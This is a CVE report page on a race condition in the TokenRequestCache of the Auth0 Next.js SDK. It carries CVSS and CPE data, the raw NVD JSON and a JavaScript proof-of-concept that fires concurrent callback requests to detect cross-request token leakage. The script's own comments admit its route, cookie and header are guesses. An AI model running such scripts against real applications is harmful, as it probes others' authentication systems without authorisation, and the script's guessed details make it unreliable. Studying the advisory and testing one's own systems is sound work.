Security Vulnerability Report
CVE-2025-67490 CVSS 5.4 MEDIUM

CVE-2025-67490

Published: 2025-12-10 23:15:49
Last Modified: 2026-03-06 19:39:31

Description

The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. When using versions 4.11.0 through 4.11.2 and 4.12.0, simultaneous requests on the same client may result in improper lookups in the TokenRequestCache for the request results. This issue is fixed in versions 4.11.2 and 4.12.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:auth0:nextjs-auth0:4.11.0:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:auth0:nextjs-auth0:4.11.1:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:auth0:nextjs-auth0:4.12.0:*:*:*:*:node.js:*:* - VULNERABLE
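Auth0 Next.js SDK >= 4.11.0 and <= 4.11.2
(Note: the description above names 4.11.2 as both affected and fixed, while the CPE entries mark only 4.11.0, 4.11.1 and 4.12.0 as vulnerable; check the vendor advisory GHSA-wcgj-f865-c7j7 for the authoritative range.)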
Auth0 Next.js SDK = 4.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
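// CVE-2025-67490 PoC - TokenRequestCache Race Condition
// This PoC demonstrates the concurrent request vulnerability in Auth0 Next.js SDK
//
// NOTE(review): the callback route, the `auth0` cookie and the `X-Auth-Token`
// response header are assumptions made by this script. The advisory text only
// describes improper TokenRequestCache lookups for simultaneous requests on
// the same client. Treat the outcome as a hint; the reliable check is the
// installed SDK version against the fixed releases (4.11.2, 4.12.1).

// node-fetch v2 supports require(); v3 is ESM-only.
const fetch = require('node-fetch');

/**
 * Sends a batch of concurrent requests to the callback route and reports
 * whether any two responses carried the same `X-Auth-Token` value.
 *
 * Responses without the header are excluded from the comparison. Counting
 * them would flag every deployment that simply never sets the header.
 *
 * @param {string} baseUrl - Origin of the application under test.
 * @returns {Promise<boolean>} true when duplicate tokens were observed,
 *   false when all returned tokens were distinct or none were returned.
 */
async function exploitCVE202567490(baseUrl) {
  console.log('[+] Starting CVE-2025-67490 exploitation test');
  console.log('[+] Target:', baseUrl);
  console.log('[+] Vulnerability: TokenRequestCache race condition');

  // Create multiple concurrent requests to trigger cache collision
  const concurrentRequests = 10;
  const requests = [];
  for (let i = 0; i < concurrentRequests; i++) {
    requests.push(
      fetch(`${baseUrl}/api/auth/callback`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
          'Cookie': `auth0=${generateMockToken(i)}`,
        },
        body: JSON.stringify({
          callbackUrl: `/user/profile?session=${i}`,
          state: `state_${i}_${Date.now()}`,
        }),
      })
    );
  }

  // Execute all requests simultaneously
  console.log(`[+] Sending ${concurrentRequests} concurrent authentication requests...`);
  const responses = await Promise.all(requests);

  // Analyze responses for cache contamination
  const tokens = responses.map((res, idx) => ({
    requestId: idx,
    status: res.status,
    token: res.headers.get('X-Auth-Token'),
  }));

  console.log('\n[+] Response Analysis:');
  tokens.forEach((t) => {
    console.log(` Request ${t.requestId}: Status ${t.status}, Token: ${t.token}`);
  });

  // headers.get() yields null for an absent header. Ten nulls collapse to a
  // single Set entry, which the uniqueness test below would misread as
  // contamination, so only compare tokens that were actually returned.
  const returnedTokens = tokens
    .map((t) => t.token)
    .filter((token) => token != null);

  if (returnedTokens.length === 0) {
    console.log('\n[?] Inconclusive: no response carried an X-Auth-Token header');
    return false;
  }

  // Check for token contamination
  const uniqueTokens = new Set(returnedTokens);
  if (uniqueTokens.size < returnedTokens.length) {
    console.log('\n[!] VULNERABLE: Cache contamination detected!');
    console.log(`[!] Expected ${returnedTokens.length} unique tokens, got ${uniqueTokens.size}`);
    return true;
  }

  console.log('\n[+] No cache contamination detected');
  return false;
}

/**
 * Builds a placeholder cookie value: base64-encoded JSON with `sub`, `aud`,
 * `iat` and `exp` claims. The value is unsigned and unencrypted, so it only
 * gives each request a distinct cookie and is not a valid session.
 *
 * @param {number} userId - Index used to make the `sub` claim unique.
 * @returns {string} Base64 string of the JSON claims.
 */
function generateMockToken(userId) {
  const issuedAt = Math.floor(Date.now() / 1000);
  return Buffer.from(JSON.stringify({
    sub: `user_${userId}`,
    aud: 'test-app',
    iat: issuedAt,
    exp: issuedAt + 3600,
  })).toString('base64');
}

// Usage: node poc.js https://vulnerable-app.example.com
const targetUrl = process.argv[2] || 'http://localhost:3000';
exploitCVE202567490(targetUrl).catch(console.error);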

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67490", "sourceIdentifier": "[email protected]", "published": "2025-12-10T23:15:48.503", "lastModified": "2026-03-06T19:39:30.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. When using versions 4.11.0 through 4.11.2 and 4.12.0, simultaneous requests on the same client may result in improper lookups in the TokenRequestCache for the request results. This issue is fixed in versions 4.11.2 and 4.12.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:auth0:nextjs-auth0:4.11.0:*:*:*:*:node.js:*:*", "matchCriteriaId": "CBE707C0-E392-4EE7-A03A-1C25BFE5DC54"}, {"vulnerable": true, "criteria": "cpe:2.3:a:auth0:nextjs-auth0:4.11.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "42224B81-6680-441E-B9E9-F4126CFCF2E4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:auth0:nextjs-auth0:4.12.0:*:*:*:*:node.js:*:*", "matchCriteriaId": "480F59EF-7D13-4DCD-82B2-50596FC6FDB1"}]}]}], "references": [{"url": "https://github.com/auth0/nextjs-auth0/commit/26cc8a7c60f4b134700912736f991a25bd6bbf0b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-wcgj-f865-c7j7", "source": "[email 
protected]", "tags": ["Vendor Advisory"]}]}}